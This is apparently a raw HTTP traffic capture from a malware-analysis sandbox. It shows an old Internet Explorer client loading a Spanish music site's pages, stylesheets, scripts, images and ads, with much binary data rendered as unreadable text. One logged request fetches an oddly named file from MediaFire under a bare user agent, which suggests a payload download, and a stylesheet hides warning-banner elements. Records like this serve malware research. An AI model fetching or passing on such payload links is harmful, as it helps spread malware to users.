FWS.....p.........N.D.....C......%.....`.>..>.........fff.5....D.t..C.t.....................@...?.........BoundingBox...........@...?.........Defaults...........@...?.........UIObjectExtensions...,.......?.......@..........0................@...?.........UIObject...!....._.D................3.C..s..r.@...$....._.D.............3..5hp.|.s..r.ND8...=..........................$.............this......tabHandler.R............?......@...............&.....boundingBox_mc.@...?.........FocusRect...N.......?.........&.....tabCapture.........@...............................r..@...?.........FocusManager...........@...?.........UIComponentExtensions...9.......?.......@..........N........................1Qh..@...?.........UIComponent...#.....@.@............c....6T4...g4.lg....'.....@.@......M......SeCB...j=h....0mFm ....q.......?.[.......themeColor..this...........mx......skins.N....ColoredSkinElement.N....setColorStyle.R..........@...?.........ProgBarCapThemeColor.?. .....8............K.P................t,.........X.........................@..P.i.@............. ...6.i.@..h..........`..y.i.@...........@...?.........ProgBarRight...&.....@.@...............AM...#.5...cV.`...?. .....9E.........JX. P................t....f.....P.......................i.@............. ...Xi.@..h..........`....i.@...........@...?.........ProgBarLeft.........P.............L...d8'..............P.........M...H....4T.F4l...w.......?.[.......themeColor..this...........mx......skins.N....ColoredSkinElement.N....setColorStyle.R............P...@...?.....
<<
<<< skipped >>>
GET /Imagenes/i_26.gif HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:29 GMT
Content-Type: image/gif
Content-Length: 573
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-23d"
Accept-Ranges: bytes
GIF89a................}}}.........uuu...mmm...........................aaa.....................jjj...yyyVVV.................................___..............................|||^^^...fff.....................!.......,.............px ....ry.....FG.Z.X..BY:.E.&K.W1..7w.,.p...\;.qY..p ..{:...U..N0......T~F_ ..663.:$MN.{..6* ...C&q...6./...Bxf...".,G...68...-.5'(..%..1!..T#4.).......U.8..U......:....T....6.T....8.t.../...:..kG... ..R..........He.....!d.....T...x1...:..K...I.&..|7.cHZ~..y.h.dJ...4....NL....H.......4.p@O....P.4a@..t.E0.a...p...@.B.... .....U..hKO..... ^.X\..;....
GET /Imagenes/f.gif HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:29 GMT
Content-Type: image/gif
Content-Length: 531
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-213"
Accept-Ranges: bytes
GIF89a.......................................................................................................................................................................................................................................................................................................................................................................................................!.......,..........p...(. 2B.'.."%@:<17..).=>.3!..58?.$-.......4.A...0.;.&..C*.#.,.... 9.6/H........E......EF.......G.......D........;....
GET /Imagenes/e_17.gif HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:29 GMT
Content-Type: image/gif
Content-Length: 130
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-82"
Accept-Ranges: bytes
GIF89a..0....................................................!.......,......0.../p.I..f..vO_'tD7t...]......\...2)s2%..."v8..ri...;....
GET /Imagenes/i_13.gif HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:29 GMT
Content-Type: image/gif
Content-Length: 156
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-9c"
Accept-Ranges: bytes
GIF89a.......................................................................................................!.......,........... .9G.@..@..$Q.0ql.uD.y.G!.;....
GET /Imagenes/i_28.gif HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:30 GMT
Content-Type: image/gif
Content-Length: 48
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-30"
Accept-Ranges: bytes
GIF89a.............!.......,................\..;....
GET /Imagenes/i-play.gif HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:30 GMT
Content-Type: image/gif
Content-Length: 393
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-189"
Accept-Ranges: bytes
HTTP/1.1 200 OK..Server: nginx/1.4.7..Date: Mon, 21 Apr 2014 11:57:30 GMT..Content-Type: image/gif..Content-Length: 393..Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT..Connection: keep-alive..ETag: "515a39e9-189"..Accept-Ranges: bytes..GIF89a.....2.LLLSSS333......PPP ??? 999211"""vvvuuu///zzznnn...ooo222......QQQ......WWW777BBB...,,,...CCC|||......--->>>666......EEE%%%___......MMMZZZ...TTT;;;..........................................!.....2.,...........@.,F,..E.0.j:.PU 6l......".`..x......Z....i..E..`...b...$...!"y.-...D.%..%.....%.D.#....".......D.)..........D)'........)D.,......D./......E. .... .DC. &.... .TBH.GBA.;....
GET /Imagenes/ii_13.gif HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:31 GMT
Content-Type: image/gif
Content-Length: 176
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-b0"
Accept-Ranges: bytes
GIF89a..0.......'''............///...111......]]]OOO...___NNN................................................!.......,......0...- A(..%..B..B...rm.x..|....pH..^......^...a....;....
GET /Imagenes/syij4.gif HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:31 GMT
Content-Type: image/gif
Content-Length: 351
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-15f"
Accept-Ranges: bytes
HTTP/1.1 200 OK..Server: nginx/1.4.7..Date: Mon, 21 Apr 2014 11:57:31 GMT..Content-Type: image/gif..Content-Length: 351..Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT..Connection: keep-alive..ETag: "515a39e9-15f"..Accept-Ranges: bytes..GIF89a...............................@@@.................................222.................................................................................................................................!.......,..........|..pH,n2.Lq.< ..a!..P..lVt.....c.".T...e...).).U...G...B..D.,.~..,%QvxBz,.Q.,(n..,..T..e,.#.W....!.,..Z-',..B.}...XV.S.N...IA.;....
GET /Imagenes/i_84.gif HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:32 GMT
Content-Type: image/gif
Content-Length: 155
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-9b"
Accept-Ranges: bytes
GIF89a.......................................................................................................!.......,............$.dYJ.....<@. B.$.C4....;....
GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Range: bytes=1460-
Unless-Modified-Since: Mon, 07 Apr 2014 17:00:48 GMT
If-Range: "5342d9c0-1ff32"
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
Cookie: __utma=127640345.1684967166.1398081329.1398081329.1398081329.1; __utmb=127640345.1.10.1398081329; __utmc=127640345; __utmz=127640345.1398081329.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 206 Partial Content
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:43 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 129406
Last-Modified: Mon, 07 Apr 2014 17:00:48 GMT
Connection: keep-alive
ETag: "5342d9c0-1ff32"
Content-Range: bytes 1460-130865/130866
vascript" src="Js/Funciones.js"></script>. <script type="text/javascript" src="Js/swfobject.js"></script>. . </head>. <body onload="iniciarPlayList(0, 1);">.. <div id="Aero"></div>. <div id="Overlay"></div>.. <div style="text-align:center;">. <div align="center" id="cuerpo">. <div id="cabecera">. <div id="logo"></div>. <div id="cabecera_abc">. <div id="c_1">. <div style="height:5px;#height:2px; _height:0px;"><img src="" height=1 style="display:none"></div>. <div align=right style=" *margin-top:-13px; _margin-top:10px; padding-left:285px; color: #f4f4f4;"> . <form action="acceso.php" method="post">.. <span class="superior-lg" style="margin-right:3px"> . <input name="Email" onfocus="if (this.value == 'Email'). this.value = '';" onblur="if (this.value == ''). this.value = 'Email'
<<
<<< skipped >>>
GET /download/icv44fwz74gj29z/hgf678.hfg HTTP/1.1
User-Agent: Mozilla/4.0
Host: VVV.mediafire.com
Cookie: ukey=d744vnx8vv7np87ybpq2qnf92ov8hquc
HTTP/1.1 302
Date: Mon, 21 Apr 2014 11:57:21 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Cache-control: no-cache
Expires: 0
Location: hXXp://download627.mediafire.com/lmpb2mr1rucg/icv44fwz74gj29z/hgf678.hfg
Pragma: no-cache
Server: MediaFire
Access-Control-Allow-Origin: *
0..
GET /Estilos/CSS.Sitio.css HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:27 GMT
Content-Type: text/css
Content-Length: 16269
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-3f8d"
Accept-Ranges: bytes
.#WARNING_BANNER_BASIC{. display:none !important;. visibility: hidden !important;.}.#WARNING_BANNER_LIVE{. display:none !important;. visibility: hidden !important;.}..body {.font-size:11px;.font-family:Arial;.background: url('../Imagenes/f.gif') #fff; background-repeat: repeat-x;.margin:0.}..anuncio{width:300px;height:250px;margin-bottom:3px;position:relative;margin-top:5px;float:left;margin-left:5px}#anuncios...abc { background-image:url('../Imagenes/i_08.gif'); border: 1px solid #f9f7f7; border-bottom: 0px ; }..#Abecdr{.padding: 0;.text-decoration: none; .background: transparent;.voice-family: "\"}\"";.voice-family: inherit;.padding-left: 5px;.}..#Abecdr div{.display:indivne;.margin:0 2px 0 0;.padding:0;.text-transform:uppercase;.}...#Abecdr a{.float:left;.color: #666;.font: bold 11px Verdana;.margin:0 12px 0 0;...padding:0 0 0 5px;.text-decoration: none; .}.#Abecdr a:hover {color: #000;}.....Listado{.float:left;.border-bottom: 1px solid #cacaca;.border-bottom-width: 0;.width: 255px;.}..* html .Listado{.width: 250px;.}...Listado ul{.padding: 0;.margin: 0;.list-style-type: none;.}...Listado li{.width: 100%;.padding: 5px 3px;.display:block;.font: normal 9px Verdana;.color: #666666;.text-decoration: none;.border-bottom: 1px solid #C0C0C0;.}...Listado a{.font: normal 12px Verdana,Arial;.color: #595959;.text-decoration: none;..}...Listado a:hover{.font: normal 12px Verdana,Arial;.color: #000;.text-decoration: none;.}...Listado li a:hover{.font: normal 12px Verdana,Arial;.color: #242424;.text-decorati
<<
<<< skipped >>>
GET /Estilos/CSS.Panel.css HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:27 GMT
Content-Type: text/css
Content-Length: 735
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-2df"
Accept-Ranges: bytes
.Menu-p{..padding: 5px 0;..margin-left: 0;..font: bold 11px Arial;..border-bottom: 1px solid #ccc;..list-style-type: none;..text-align: left; ..}...Menu-p li{..display: inline;..margin: 0;..}...Menu-p li a{..text-decoration: none;..padding: 5px 7px;..margin-right: 0px;..border: 1px solid #ccc;..border-bottom: none;..background-color: #f4f4f4;..color: #666;..}...Menu-p li a:visited{..color: #2d2b2b;..}...Menu-p li a:hover{..background-color: #fff;..background-position:0% -8px;..color: #2d2b2b;..}.....Menu-p li.selecc a{..position: relative;..top: 1px;..padding-top: 8px;..background-color: #fff;..color: #000;..}..#cont_menu {margin-top:-12px;_margin-top:-19px;#margin-top:-20px;padding:10px; border:1px solid #ccc;}....
GET /Js/Funciones.js HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:27 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 8384
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-20c0"
Accept-Ranges: bytes
// Coddigo Javascript By Andy (^_^)!..var cabecera = '<span style="padding-right:50px; height:16px"><a href="#cerrar" onclick=" ocultar(); return false"><img border=0 align=right src="./Imagenes/x-i.gif"></a></span><div style="width:450px; padding:30px">';..function limitesPantalla() {. .. if(typeof( window.innerWidth ) == 'number' ) .. {return window.innerWidth "-" window.innerHeight; .. }else if(document.documentElement && (document.documentElement.clientWidth||document.documentElement.clientHeight)).. {return document.documentElement.clientWidth "-" document.documentElement.clientHeight;.. }else if( document.body && ( document.body.clientWidth || document.body.clientHeight ) ).. {return document.body.clientWidth "-" document.body.clientHeight;.. }return null;..}..function arreglaraResolucion(capa){...var resolucion = limitesPantalla().split("-");...$(capa).style.width = Math.floor(resolucion[0]) "px";...$(capa).style.height = Math.floor(resolucion[1]) "px";..}....function MuestraCapa(){... arreglaraResolucion("Aero");... $("Aero").style.display = "block";....$("Overlay").style.display = "block"; ... ..}..function ocultar(){.. $("Aero").style.display = "none";.. $("Overlay").style.display = "none";..}..function ReportarError(){...MuestraCapa();....var FoHTML = '<div style="width:500px"><div id="Errors"></div>Email:<br /><input class="CampoLg" id="rep_Email" style="font:normal 12px Arial; width:450px" oncli
<<
<<< skipped >>>
GET /Imagenes/i-2i.gif HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:28 GMT
Content-Type: image/gif
Content-Length: 1097
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-449"
Accept-Ranges: bytes
HTTP/1.1 200 OK..Server: nginx/1.4.7..Date: Mon, 21 Apr 2014 11:57:28 GMT..Content-Type: image/gif..Content-Length: 1097..Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT..Connection: keep-alive..ETag: "515a39e9-449"..Accept-Ranges: bytes..GIF89a2.........ppp...{{{sss...qqqtttvvvzzzuuu~~~ooonnn...xxx......VVV............rrr......yyy...}}}......aaa|||.........lll...........................UUU........................FFFcccYYY%%%...EEE[[[)))XXX]]]...___......RRR...ddd!!!eeebbb........................jjj///.........SSS...............222..................WWW......ggg............iii...kkkmmmfff..........................................!.......,....2.......&>o.n.........o>&T.kjf........jk.^mDj........jDS 6g........g6..k...........l...........i...........d.d........n.....n..d....n.....p...A...X..@....Nh(P!.... ^...@...).,......,.(.... .D...@...6)8(q......*.@AAM..Z....@..P.D.....%.F.H0.......@.....4.F.r....#.........P..Y.w..0.6..q F........I.&.....`....$ ."..a.5..`r...6.R?. .C..c..`.`.....(PcD...)..N..x.v2@...!......y@]........B....<."`......< .b....<......7/.H...........p$.AG.$.G.3..A......`(..........0C.....L..........,R.C...@..........F...0...h@..)6...C.`....@.$.J..#.p.a..ppX..$4.c.$p.%.[fY%.0..@._v...@.(..t.i..x..D.W......*..=.....&....6.(.9.....Vj...f.).?`.D...*....j..q$.........~....|p....z....`..7.Q....k...&{l.7 aB .;....
<<
<<< skipped >>>
GET / HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:29 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 130866
Last-Modified: Mon, 07 Apr 2014 17:00:48 GMT
Connection: keep-alive
ETag: "5342d9c0-1ff32"
Accept-Ranges: bytes
.<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml">. <head>. <title>Musica Online</title>. <meta name='title' content="Musica Online">. <meta name='description' content="Musica Online tiene un gran repertorio de musica en linea, disfruta de la canciones que mas suenan en la disco, mira los videos y letras de tus canciones favoritas">. <meta name='keywords' content="MUSICA ONLINE,ESCUCHAR MUSICA, MUSICA EN LINEA">. <meta name="robots" content="index, follow"/>. <meta name="author" content="Musica Online"/>. <meta name="copyright" content="Musica Online 2012 Derechos Reservados"/>. <meta http-equiv="Content-Language" content="es"/>. <meta name="revisit" content="1 days"/>. <meta NAME="googlebot" content="index, follow" />. <base href="hXXp://esmusicon.com/" />. <META HTTP-EQUIV="Content-Type" content="text/html; charset=utf-8" />. <link href="./Estilos/CSS.Sitio.css" rel="stylesheet" type="text/css" />. <link href="./Estilos/CSS.Panel.css" rel="stylesheet" type="text/css" />. <script type="text/javascript" src="Js/Principal.js"></script&g
<<
<<< skipped >>>
GET /atoms/c8/3b/51/0b/c83b510be812cec3ea3446015eb76621.gif HTTP/1.1
Accept: */*
Referer: hXXp://u.pub-fit.com/2454.html?s=300x250
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: content.yieldmanager.edgesuite.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Apache
ETag: "c83b510be812cec3ea3446015eb76621:1362040945"
Last-Modified: Thu, 28 Feb 2013 08:42:25 GMT
Accept-Ranges: bytes
Content-Length: 12790
Content-Type: image/gif
Cache-Control: max-age=31536000
Date: Mon, 21 Apr 2014 11:57:30 GMT
Connection: keep-alive
GIF89a,............LYd...........].....$........................u.............................kz....--,......Z[[......hs~.........Yft......iii.....................===...........?......yyy..k........:......kdR..................P..SQM...MG<............LLL...am|...............z.............p...........@3;Cry........................M..j.....T}..........8oe0................r..........'$!;?D32/.....#@;,..g~xf...........?..@k..&-2c]N..oTK.... .......2..PbZ .. @KS..^ /3..............[RSSn`......#/(#.......................................:...............................................................................................................................?..............................................................|VP@.......................@......vo^...... ..........!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c061 64.140949, 2010/12/07-10:57:01 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:6CD02DE71020681192B0F62CC8CAFC32" xmpMM:DocumentID="xmp.did:E08C90CE76DB11E2999F9E83767C5A85" xmpMM:InstanceID="xmp.iid:E08C90CD76DB11E2999F9E83767C5A85" xmp:CreatorTool="Adobe Photoshop CS5.1 Macintosh"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:
<<
<<< skipped >>>
GET /atoms/c5/f8/76/0e/c5f8760e7af5ff75c20de7295e421a6f.png HTTP/1.1
Accept: */*
Referer: hXXp://u.pub-fit.com/2454.html?s=300x250
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: content.yieldmanager.edgesuite.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Apache
ETag: "c5f8760e7af5ff75c20de7295e421a6f:1369930580"
Last-Modified: Thu, 30 May 2013 16:16:20 GMT
Accept-Ranges: bytes
Content-Length: 8452
Content-Type: image/png
Cache-Control: max-age=31536000
Date: Mon, 21 Apr 2014 11:57:44 GMT
Connection: keep-alive
.PNG........IHDR...,..........mz.....tEXtSoftware.Adobe ImageReadyq.e<...fiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:715197BE01A8E211AE8E8C0F5502677A" xmpMM:DocumentID="xmp.did:E2D1E953B17811E2B5CAADD2918C7F5D" xmpMM:InstanceID="xmp.iid:E2D1E952B17811E2B5CAADD2918C7F5D" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:67A5A78D05A8E211AE8E8C0F5502677A" stRef:documentID="xmp.did:715197BE01A8E211AE8E8C0F5502677A"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.$.....4IDATx.....U....[f...@..7V..}....O.*....*.Rh.J*)CL.L.$&~1..$....,.SQ..G...{...2#.,..`.....y.9w...\..f......k....ow...>.....r..........@....,.@....,......,................@......@....,.@....,......,................@......@....,.@....,.@....,......,................@......@....,.@....,......,................@......@....,.@....,......,......,................@......@....,.@....,......,.....................PUUE/.@..=z4....... X...!{...oM.4..4LS.]....P.jM.j.....q.T...X..T.....D.k.....@.4.......|$Aw....."Mw"V..t..`.....K.bu
<<
<<< skipped >>>
GET /atoms/fa/1b/6b/97/fa1b6b9794e5b240bbad703d9f4c9a12.png HTTP/1.1
Accept: */*
Referer: hXXp://u.pub-fit.com/2454.html?s=300x250
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: content.yieldmanager.edgesuite.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Apache
ETag: "fa1b6b9794e5b240bbad703d9f4c9a12:1367856632"
Last-Modified: Mon, 06 May 2013 16:10:18 GMT
Accept-Ranges: bytes
Content-Length: 15267
Content-Type: image/png
Cache-Control: max-age=31536000
Date: Mon, 21 Apr 2014 11:57:44 GMT
Connection: keep-alive
.PNG........IHDR...,.................tEXtSoftware.Adobe ImageReadyq.e<...fiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:211756DD4AB2E211A404EF4A360AC1CD" xmpMM:DocumentID="xmp.did:913497AFB61D11E2A8829ABD2766D2B2" xmpMM:InstanceID="xmp.iid:913497AEB61D11E2A8829ABD2766D2B2" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:FD1762791CB6E211B633949A72F8A6AB" stRef:documentID="xmp.did:211756DD4AB2E211A404EF4A360AC1CD"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>E.....7.IDATx..}.xT....IBH...@....l*....U.....vQ.b .Zk.j..Z.........Q6eQ..H...@....IX..B.d.....s<.3...-...e.s...9.{...s.=..u...p(6......QQ..5..`..D'\.b..."...U....D..x..7.Q.HX.T.UV...%(...(%......h.m.:EB...VY.jfL...Y4lJ..PU..1...U.C...0.........y..v;.6F...B..N..P.b..9..3.c.Ua$..i.Fy......<yr..];v...~..=..#))).}.Qd..'.|.C...?.pHJk..a.N...8`1=u....o............kb...#rQ...P3..[.f...%<..cIII.|.BDB(.P. }=.]..H.@.>..K......'i.....qc.. ....*.K..s....}.u....-.V....$.8p.W.b..].Ejjj]wG.,..aEEEi...1..J.z....|..7..s.....{..I.
<<
<<< skipped >>>
GET /swidget/h20d2qja0b7p.gif HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: whos.amung.us
Connection: Keep-Alive
HTTP/1.1 303 See Other
